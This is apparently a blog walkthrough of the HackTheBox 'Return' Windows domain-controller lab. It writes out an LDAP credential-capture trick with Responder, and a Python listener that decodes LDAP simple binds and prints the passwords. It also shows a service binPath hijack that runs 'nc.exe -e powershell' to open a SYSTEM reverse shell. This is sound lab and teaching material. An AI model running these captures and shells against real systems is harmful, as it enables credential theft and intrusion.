17 September 2022 #CTF #HTB #box #easy #windows

$ sudo nmap -Pn -A -oN enum/1000tcp.nmap
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-09-15 21:29:29Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-09-15T21:29:41
|_  start_date: N/A
|_clock-skew: 18m33s

It looks very much like an Active Directory Domain Controller: Kerberos, LDAP (with the return.local domain in the banner), DNS and SMB with signing required are all typical for a DC.


The box has DNS listening on TCP, so we can try a zone transfer:

$ dig @ return.local axfr

; <<>> DiG 9.18.6-2-Debian <<>> @ return.local axfr
; (1 server found)
;; global options: +cmd
; Transfer failed.

(We got the hostname from the nmap scan)

Nothing, let's move on.


Looking at the website, it says 'HTB Printer Admin Panel'. There is a 'Settings' page:

printer settings page

Let's inspect the HTML to see if the masked password field holds a real value:

Unlucky, the field's value is just the plain-text placeholder, not the real password.

We can click on this 'Update' button and intercept the request with Burp to see what it is doing:

intercept request with Burp

No sign of the other form fields in the request, but there is this 'ip' parameter that is interesting: it is the LDAP server the panel connects to, and it will authenticate there with the stored service account credentials.

We will change it to our local box IP address, but before that let's set up Responder so its LDAP listener is ready to accept (and log) that bind:

$ sudo responder -I tun0

Now forward the request with the modified ip parameter and check if responder caught something:

[LDAP] Cleartext Client   :
[LDAP] Cleartext Username : return\svc-printer
[LDAP] Cleartext Password : 1edFg43012!!

Sweet, we have some creds. The panel used an LDAP simple bind, which sends the username and password as plain octet strings, so Responder could log them as-is.
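To make concrete what Responder logged above, here is an added example (not part of the original post and not Responder's code): a minimal BER encoder/decoder for the LDAP BindRequest PDU from RFC 4511, plus a one-shot listener that does what Responder's LDAP module does, accept a connection, decode the bind and print the credentials. The sample bind is constructed here; the listen host and port are assumptions, and the listener only runs if you call it.

```python
import socket

# --- minimal BER helpers, enough for the LDAP BindRequest PDU (RFC 4511 s4.2) ---

def _tlv(tag: int, value: bytes) -> bytes:
    """Encode one BER tag-length-value triple (short or long-form length)."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    length_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_bytes)]) + length_bytes + value


def _read_tlv(buf: bytes, pos: int):
    """Decode the TLV at buf[pos]; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: next N bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def build_bind_request(name: str, password: str, message_id: int = 1) -> bytes:
    """LDAPMessage { messageID, BindRequest { version 3, name, simple password } }.
    This is what an LDAP client (like the printer panel) sends for a simple bind."""
    bind = (_tlv(0x02, b"\x03")                  # version INTEGER 3
            + _tlv(0x04, name.encode())          # name LDAPDN (OCTET STRING)
            + _tlv(0x80, password.encode()))     # authentication [0] simple: cleartext
    return _tlv(0x30, _tlv(0x02, bytes([message_id])) + _tlv(0x60, bind))


def parse_bind_request(msg: bytes):
    """Return (message_id, version, name, password) for a simple BindRequest, else None."""
    tag, body, _ = _read_tlv(msg, 0)
    if tag != 0x30:                             # LDAPMessage SEQUENCE
        return None
    tag, mid, pos = _read_tlv(body, 0)
    if tag != 0x02:
        return None
    tag, bind, _ = _read_tlv(body, pos)
    if tag != 0x60:                             # [APPLICATION 0] BindRequest
        return None
    _, version, pos = _read_tlv(bind, 0)
    _, name, pos = _read_tlv(bind, pos)
    auth_tag, auth, _ = _read_tlv(bind, pos)
    if auth_tag != 0x80:                        # 0xA3 would be SASL (e.g. GSSAPI), not cleartext
        return None
    return (int.from_bytes(mid, "big"), int.from_bytes(version, "big"),
            name.decode(), auth.decode())


def listen_for_bind(host: str = "0.0.0.0", port: int = 389):
    """Accept one TCP connection and print the credentials from its simple bind.
    host/port are assumed values; binding 389 needs root. Returns the parsed tuple or None."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            parsed = parse_bind_request(conn.recv(4096))
            if parsed:
                print(f"[LDAP] Cleartext Client   : {peer[0]}")
                print(f"[LDAP] Cleartext Username : {parsed[2]}")
                print(f"[LDAP] Cleartext Password : {parsed[3]}")
            return parsed


if __name__ == "__main__":
    # Constructed sample: the bind the printer panel would send to our fake "LDAP server".
    sample = build_bind_request("return\\svc-printer", "1edFg43012!!")
    print(sample.hex())               # the password is readable right there in the bytes
    print(parse_bind_request(sample))
```

The decoder deliberately refuses anything other than the [0] simple choice: a client doing a SASL/GSSAPI bind (tag 0xA3) would hand over a Kerberos blob instead of a password, which is why forcing the target to talk plain LDAP to a host you control matters for this trick.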


Check if we can WinRM with crackmapexec:

$ crackmapexec winrm -u svc-printer -p '1edFg43012!!'
SMB    5985   PRINTER          [*] Windows 10.0 Build 17763 (name:PRINTER) (domain:return.local)
HTTP    5985   PRINTER          [*]
WINRM    5985   PRINTER          [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)

Looks like we can. We'll use evil-winrm:

$ evil-winrm -i -u svc-printer -p '1edFg43012!!'
*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\svc-printer\desktop> ls

    Directory: C:\Users\svc-printer\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/17/2022   1:37 AM             34 user.txt

Be sure to quote the password as !! is interpreted by bash (it evaluates to the last command run).


We can get a lot of useful information with commands like whoami /all and net user:

*Evil-WinRM* PS C:\Users\svc-printer\desktop> whoami /all

Everyone		    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators    Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled

We can abuse 'SeLoadDriverPrivilege' by loading a malicious driver (on a current Windows build that means a signed but vulnerable driver, which is more work). There is also this 'Server Operators' group that is really good for us: members of this built-in group can, among other things, modify the configuration of services and start and stop them, and many services on a domain controller run as LocalSystem.

This means we can stop a service, change its binary path (binPath) to something naughty (like nc or whatever) and start it again, and the Service Control Manager will run our binary as SYSTEM.

First, let's find a service to abuse:

*Evil-WinRM* PS C:\Users\svc-printer\desktop> get-service
Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
At line:1 char:1
+ get-service
+ ~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Get-Service], InvalidOperationException
    + FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetServiceCommand

*Evil-WinRM* PS C:\Users\svc-printer\desktop> sc.exe query
[SC] OpenSCManager FAILED 5:

Access is denied.

Hmm, enumerating services is denied (OpenSCManager is refused the enumerate right), but that does not stop us from opening a specific service by name. We'll use VSS, the service shown in this post, which has a lot of really good information on Active Directory privesc.

evil-winrm has a nice feature that enables you to upload a file from your local box to the target:

*Evil-WinRM* PS C:\Users\svc-printer\desktop> upload /usr/share/windows-binaries/nc.exe C:\Users\svc-printer\desktop\nc.exe
Info: Uploading /usr/share/windows-binaries/nc.exe to C:\Users\svc-printer\desktop\nc.exe

Data: 79188 bytes of 79188 bytes copied

Info: Upload successful!

Now let's modify the service's config, (re)start it and hopefully get a reverse shell (the stop failing because VSS was not running is fine, we only need it stopped):

*Evil-WinRM* PS C:\Users\svc-printer\desktop> sc.exe stop vss
[SC] ControlService FAILED 1062:

The service has not been started.
*Evil-WinRM* PS C:\Users\svc-printer\desktop> sc.exe config vss binpath="cmd.exe /c C:\users\svc-printer\desktop\nc.exe -e powershell 4242"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\svc-printer\desktop> sc.exe start vss

We have to use cmd.exe /c <payload> because the Service Control Manager expects the process it starts to register as a service; a plain binary like nc never does, so after about 30 seconds the SCM gives up and kills it. With cmd.exe as the parent, the SCM kills cmd.exe while the child nc.exe, and with it our shell, survives.

And if all went well, with a listener (nc -lvnp 4242) waiting on our box, we should have a reverse shell as nt authority\system. Remember that we just changed the configuration of a real service on the domain controller; put the original binPath back once you are done.

Key Takeaways